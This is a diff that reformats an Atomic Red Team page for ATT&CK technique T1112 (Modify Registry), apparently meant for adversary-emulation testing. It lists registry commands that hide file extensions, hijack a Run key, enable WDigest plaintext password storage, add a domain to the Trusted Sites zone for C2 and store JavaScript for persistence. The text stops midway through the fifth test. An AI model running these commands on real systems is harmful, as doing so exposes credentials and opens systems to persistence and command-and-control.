@@ -1,12 +1,24 @@ # T1112 - Modify Registry + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1112) +
Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution. -Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples). +Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The +built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote +Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may +contain functionality to interact with the Registry through the Windows API (see examples). -Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017) +Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which +will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities +using the Win32 API. 
(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal +payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding +Reg Jul 2017) -The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.
+The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires +the remote Registry service to be running on the target system. (Citation: Microsoft Remote) +Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote +system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication. ## Atomic Tests @@ -20,123 +32,107 @@ The Registry of a remote system may be modified to aid in execution of files as - [Atomic Test #5 - Javascript in registry](#atomic-test-5---javascript-in-registry) -
## Atomic Test #1 - Modify Registry of Current User Profile - cmd -Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully." -will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. - -**Supported Platforms:** Windows - - - +Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The +operation completed successfully." +will be displayed. Additionally, open Registry Editor to view the new entry in +HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +**Supported Platforms:** Windows +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f ``` #### Cleanup Commands: + ```cmd reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 ``` - - - -

## Atomic Test #2 - Modify Registry of Local Machine - cmd -Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when + +Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This +should only be possible when CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully." -will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run. +will be displayed. Additionally, open Registry Editor to view the modified entry in +HKCU\Software\Microsoft\Windows\CurrentVersion\Run. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f ``` #### Cleanup Commands: + ```cmd reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 ``` - - - -

## Atomic Test #3 - Modify registry to store logon credentials -Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). + +Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / +cleartext password dumping). Upon execution, the message "The operation completed successfully." will be displayed. -Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. +Additionally, open Registry Editor to view the modified entry in +HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f ``` #### Cleanup Commands: + ```cmd reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 ``` - - - -

## Atomic Test #4 - Add domain to Trusted sites Zone -Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365. + +Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over +office365. Upon execution, details of the new registry entries will be displayed. -Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\. +Additionally, open Registry Editor to view the modified entry in HKCU: +\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\. https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | bad_domain | Domain to add to trusted site zone | String | bad-domain.com| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\" @@ -148,42 +144,33 @@ new-itemproperty $key$name -Name * -Value 2 -Type DWORD; ``` #### Cleanup Commands: + ```powershell $key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\" Remove-item $key -Recurse -ErrorAction Ignore ``` - - - -

## Atomic Test #5 - Javascript in registry + Upon execution, a javascript block will be placed in the registry for persistence. -Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings. +Additionally, open Registry Editor to view the modified entry in HKCU: +\Software\Microsoft\Windows\CurrentVersion\Internet Settings. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "